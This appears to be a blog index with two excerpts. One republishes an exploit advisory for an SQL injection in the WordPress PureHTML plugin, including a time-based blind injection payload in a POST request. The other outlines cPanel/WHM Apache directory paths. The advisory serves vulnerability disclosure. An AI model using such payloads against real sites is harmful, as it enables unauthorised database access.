WordPress PureHTML plugin

06/09/2011 0 Comments

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !wp_verify_nonce( $_POST[‘PureHTMLNOnce’], …

Estrutura de diretórios do Cpanel/WHM (arquivos fundamentais para uso normal)

26/04/2009 0 Comments

Apache /usr/local/apache + bin- apache binaries are stored here – httpd, apachectl, apxs + conf – configuration files – httpd.conf + cgi-bin + domlogs – domain log files are stored here + htdocs + include – header files + libexec – shared object (.so) files are stored here – libphp4.so,mod_rewrite.so + logs – apache logs …